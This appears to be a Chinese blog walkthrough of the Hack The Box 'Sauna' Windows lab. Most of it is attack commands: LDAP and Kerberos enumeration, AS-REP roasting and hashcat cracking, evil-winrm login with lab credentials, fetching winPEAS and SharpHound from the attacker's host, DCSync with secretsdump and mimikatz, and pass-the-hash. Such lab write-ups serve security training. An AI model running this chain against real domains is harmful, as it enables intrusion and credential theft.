• 【Hack The Box】windows练习-- Sauna


    HTB 学习笔记

    Hack The Box】windows练习-- Sauna


    🔥系列专栏:Hack The Box
    🎉欢迎关注🔎点赞👍收藏⭐️留言📝
    📆首发时间:🌴2022年11月7日🌴
    🍭作者水平很有限,如果发现错误,还望告知,感谢!

    在这里插入图片描述

    信息收集

    53/tcp   open  domain?
    | fingerprint-strings: 
    |   DNSVersionBindReqTCP: 
    |     version
    |_    bind
    80/tcp   open  http          Microsoft IIS httpd 10.0
    | http-methods: 
    |_  Potentially risky methods: TRACE
    |_http-server-header: Microsoft-IIS/10.0
    |_http-title: Egotistical Bank :: Home
    88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-02-16 03:21:43Z)
    135/tcp  open  msrpc         Microsoft Windows RPC
    139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
    389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
    445/tcp  open  microsoft-ds?
    464/tcp  open  kpasswd5?
    593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
    3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
    3269/tcp open  tcpwrapped
    5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
    |_http-server-header: Microsoft-HTTPAPI/2.0
    |_http-title: Not Found
    1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
    SF-Port53-TCP:V=7.80%I=7%D=2/15%Time=5E4844A2%P=x86_64-pc-linux-gnu%r(DNSV
    SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
    SF:x04bind\0\0\x10\0\x03");
    Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
    
    Host script results:
    |_clock-skew: 8h00m40s
    | smb2-security-mode: 
    |   2.02: 
    |_    Message signing enabled and required
    | smb2-time: 
    |   date: 2020-02-16T03:24:01
    |_  start_date: N/A
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
    • 18
    • 19
    • 20
    • 21
    • 22
    • 23
    • 24
    • 25
    • 26
    • 27
    • 28
    • 29
    • 30
    • 31
    • 32
    • 33
    • 34
    • 35
    • 36

    我看web

    转了一圈发现了几个用户
    我将自己创建一个用户本,基本上就是shauncoins以及scoins
    基本就这两种命令习惯

    在这里插入图片描述初步具备的服务,我也将从下面几个方面来枚举一些信息
    dns,lda,web,winrm,smb,rpc

    还知道了下面的一些域

    (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)

    EGOTISTICAL-BANK.LOCAL0

    ldap

    nmap --script=ldap* 10.129.95.180
    
    • 1

    在这里插入图片描述

    ldapsearch -H ldap://10.129.95.180 -x -s base '' "(objectClass=*)" "*" + 
    
    • 1

    在这里插入图片描述

    ldapsearch -H ldap://10.129.895.180 -x -b 'DC=EGOTISTICAL-BANK,DC=LOCAL'
    
    • 1

    在这里插入图片描述

    ldapsearch -H ldap://10.129.95.180 -x -b DC=EGOTISTICAL-BANK,DC=LOCAL "(objectClass=person)" |   grep "AccountName:"
    
    • 1

    DC=EGOTIST ICAL-BANK,DC=LOCAL

    获得了一些信息
    加入hosts即可,其他的啥都没有

    在这里插入图片描述

    DNS - TCP/UDP 53

    dig axfr @10.10.10.175 sauna.htb
    dig axfr @10.10.10.175 egotistical-bank.local
    
    • 1
    • 2

    88 AS-REP Roasting

    AS-REP 背景

    AS-REP Roasting。 通常,尝试通过 Kerberos 请求身份验证时,首先请求方必须向 DC 进行身份验证。 但是有一个选择, DONT_REQ_PREAUTHDC 只会将哈希发送给未经身份验证的用户。 AS-REP Roasting 正在查看是否有任何已知用户碰巧设置了此选项。
    获取哈希

    我将使用从 Kerbrute 收集的用户列表,然后运行 GetNPUsers.py寻找易受攻击的用户。 三个返回为不易受攻击,但一个给出了哈希:
    在这里插入图片描述

    1. 爆破用户
    /root/Desktop/tools/windows/kerbrute_linux_amd64 userenum -d EGOTISTICAL-BANK.LOCAL /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt --dc 10.10.10.175
    
    • 1
    1. 检查AS-REP Roasting
      可能会出hasn
    GetNPUsers.py 'EGOTISTICAL-BANK.LOCAL/' -usersfile users.txt -format hashcat -outputfile hashes.aspreroast -dc-ip 10.10.10.175
    
    • 1
    1. 爆破
     hashcat -m 18200 hashes.aspreroast /usr/share/wordlists/rockyou.txt --force
    
    • 1
    evil-winrm -i 10.10.10.175 -u fsmith -p Thestrokes23
    
    • 1

    提权枚举

    iwr http://10.10.14.8/winpeas64.exe -o winpeas.exe
    然后运行winpeas
    
    • 1
    • 2
    autologon

    发现了下面这个有趣的东西
    svc_loanmanager的autologon

    在这里插入图片描述转储到本地

    reg.exe query "HKLM\software\microsoft\windows nt\currentversion\winlogon"
    
    • 1

    .\mimikatz ‘lsadump::dcsync /domain:EGOTISTICAL-BANK.LOCAL /user:administrator’ exit

    在这里插入图片描述

    DCSync

    因为这是在域中,所有blood必不可少

    1. 上传ps1脚本或者exe()如果是exe直接执行第三步的exe步骤,或者远程
    wget http://10.10.14.13/SharpHound.ps1 -o SharpHound.ps1
    
    远程加载:
    
    2. 加载模块
    Import-Module .\SharpHound.ps1
    3. 运行,生成一个zip
    invoke-bloodhound -collectionmethod all -domain htb.local -ldapuser svc-alfresco -ldappass s3rvice
    4. 下载下来(或者用分享回传方法)
    download
    5. neo4j console
    6. bloodhound
    7. 把压缩包拖进去即可
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14

    而后我们找到我们当前用户
    在这里插入图片描述
    在这里插入图片描述GetChanges
    可以DCSync

    secretsdump.py 'svc_loanmgr:Moneymakestheworldgoround!@10.129.95.180'
    
    • 1

    或者

    .\mimikatz 'lsadump::dcsync /domain:EGOTISTICAL-BANK.LOCAL /user:administrator' exit
    
    • 1

    都可以

    在这里插入图片描述

    带hash登录

    wmiexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e' -dc-ip 10.129.95.180 administrator@10.129.95.180
    
    • 1

    在这里插入图片描述

    在这里插入图片描述

  • 相关阅读:
    代码随想录算法训练营Day6 | 242.有效的字母异位词 ●349. 两个数组的交集 ● 202. 快乐数● 1. 两数之和
    EBS 并发管理器无法启动处理
    CocosCreator3.8研究笔记(四)CocosCreator 脚本说明及使用(上)
    typora操作手册
    StyleGAN2-ADA (代码理解)
    我第一份Python自动化测试工作能找到13k的工作,就是掌握了这些技术栈
    后缀是SS的文件怎么打开
    Centos (含Rocky-Linux) VSFTPD 简单设置
    模拟可执行的四旋翼模型——在未知环境下运动规划应用研究(Matlab代码实现)
    hue编译、启动、使用
  • 原文地址:https://blog.csdn.net/weixin_65527369/article/details/127821575